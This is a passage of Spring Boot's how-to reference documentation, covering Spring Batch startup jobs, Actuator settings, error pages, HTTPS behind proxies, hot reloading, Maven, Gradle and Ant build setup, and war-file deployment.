listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any\nother factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\n\nThis section answers questions that arise from using Spring Batch with Spring Boot.\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you need to implement `BatchConfigurer`. See\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\nFor more about Spring Batch, see the https:\/\/projects.spring.io\/spring-batch\/[Spring Batch\nproject page].\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\n[TIP]\n.Specifying job parameters on the command line\n====\nUnlike command line option arguments that\n<<spring-boot-features.adoc#boot-features-external-config-command-line-args,set properties\nin the `Environment`>> (i.e. by starting with `--`, such as\n`--my-property=value`), job parameters have to be specified on the command line without\ndashes (e.g. `jobParam=value`).\n====\n\nIf the application context includes a `JobRegistry`, the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems, where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\nSpring Boot includes the Spring Boot Actuator. This section answers questions that often\narise from its use.\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port, set the external property:\n`management.server.port`. To listen on a completely different network address (such as\nwhen you have an internal network for management and an external one for user\napplications), you can also set `management.server.address` to a valid IP address to which\nthe server is able to bind.\n\nFor more detail, see the\n{sc-spring-boot-actuator-autoconfigure}\/web\/server\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n\"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`\"\nin the \"`Production-ready features`\" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using. Note that\nSpring Boot still tries to resolve the error view, so you should probably add your own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you\nuse. For example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftl` template. In general, you\nneed a `View` that resolves with a name of `error` or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration, you should find\na `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would\nbe a simple way of doing that. See\n{sc-spring-boot-autoconfigure}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`]\nfor more options.\n\nSee also the section on \"`<<boot-features-error-handling, Error Handling>>`\" for details\nof how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n=== Sanitize sensible values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive\nso keys matching a certain pattern are sanitized by default (i.e. their values are\nreplaced by `+******+`).\n\nSpring Boot uses sensible defaults for such keys: for instance, any key ending with the\nword \"password\", \"secret\", \"key\" or \"token\" is sanitized. It is also possible to use a\nregular expression instead, such as `+*credentials.*+` to sanitize any key that holds the\nword `credentials` as part of the key.\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize`\nand `management.endpoint.configprops.keys-to-sanitize` respectively.\n\n\n\n[[howto-security]]\n== Security\n\nThis section addresses questions about security when working with Spring Boot, including\nquestions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application,\nit switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`,\nor `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not\ncreated, so you have the full feature set of Spring Security available (such as\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various\nauthentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you use Tomcat as a servlet container, then\nSpring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front-end proxies. You can switch on the valve\nby adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve. Alternatively, you can\nadd the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some)\nrequests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following\n`HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n[[howto-hotswapping]]\n== Hot Swapping\n\nSpring Boot supports hot swapping. This section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading. The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides\nadditional development-time features, such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (such as template\ncaching). Devtools works by monitoring the classpath for changes. This means that static\nresource changes must be \"built\" for the change to take effect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, the Make Project\ncommand triggers the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also allow\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (described later in this document). If you use the\n`spring-boot-devtools` module, these properties are\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as\nhttps:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel] it is usually significantly faster than\na \"`cold start`\". You should probably give it a try before investigating some of the more\ncomplex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it\nshould reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\n\nSpring Boot includes build plugins for Maven and Gradle. This section answers common\nquestions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing\nthe coordinates, name, and version of the project. The plugins can also be configured\nto add additional properties through configuration. When such a file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-site}[Spring Boot Maven Plugin documentation]\nfor more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the\n{spring-boot-gradle-plugin-reference}\/#integrating-with-actuator-build-info[Spring Boot\nGradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\n\nBoth Maven and Gradle allow generating a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. To use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`]\nplugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.5.1\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format:\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. Using\nthis format lets the time be parsed into a `Date` and its format, when serialized to JSON,\nto be controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nIf you use a Maven build that inherits directly or indirectly from\n`spring-boot-dependencies` (for instance, `spring-boot-starter-parent`) but you want to\noverride a specific third-party dependency, you can add appropriate `<properties>`\nelements. Browse the\n{github-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version,\nyou would add the following property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<slf4j.version>\n\t<\/properties>\n----\n\nNOTE: Doing so only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>`, you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-reference}\/#managing-dependencies-customizing[this section]\nof the Gradle plugin's documentation.\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR. If you\nuse the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are\nrepackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin. However, you must\nadditionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support, which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked when the executable jar first runs. Such nested jars are written\nbeneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that\nit will not delete the jars that have been unpacked to the temporary directory while the\napplication is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven\nPlugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products,\nthe executable version has additional configuration files that are not needed in a library\njar. For example, the `application.yml` configuration file might by excluded from the\nnon-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar\nfor the library, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you\ncan use the `jvmArguments` property of the {spring-boot-maven-plugin-site}[maven plugin].\n\nSee {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using `spring-boot-antlib`\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war\narchive. To make it executable, you can either use the `spring-boot-antlib`\nmodule or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n`BOOT-INF\/classes` directory. If you are building a war, package the application's\nclasses in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n`WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\ndirectory for a jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\nentries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class`\nis available).\n. Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class`\nattribute in the manifest and specify the other properties it needs as manifest entries --\nprincipally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` file with a `manual` task that should work if you run it with the following\ncommand:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nThen you can run the application with the following command:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\n\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and\napplications are deployed by default on an embedded Reactor Netty server,\nWar deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. Doing so\nmakes use of Spring Framework's Servlet 3.0 support and lets you configure your\napplication when it is launched by the servlet container. Typically, you should update\nyour application's main class to extend `SpringBootServletInitializer`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war\nfile rather than a jar file. If you use Maven and `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you), all you need to do is to modify `pom.xml` to\nchange the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not\ninterfere with the servlet container to which the war file is deployed. To do so, you\nneed to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration. Among other\nlimitations, `compileOnly` dependencies are not on the test classpath, so any web-based\nintegration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided produces an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication by using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based\nexample] of the previously described configuration.\n\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to\na Spring Boot application. To do so, throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`. Spring MVC web applications are generally amenable to first\ncreating a deployable war application and then migrating it later to an executable war\nor jar. See the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a\nclass called `Application`) and adding the Spring Boot `@SpringBootApplication`\nannotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that, whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. The same applies to `messages.properties`\n(which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application (for instance, using other\nservlets or filters), you may need to add some configuration to your `Application`\ncontext, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\ncontainer as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a\n`<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\nyour `Application`. Alternatively, simple cases where annotation configuration is\nheavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to\nyour `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and in the `main` method in a class similar to the\nfollowing:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntechniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally, all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (for example, if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to combine all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\ncombining does not work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features usually\nneeds to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to Spring\nBoot applications, and the previously mentioned guidance may help. However, you may yet\nencounter problems. In that case, we 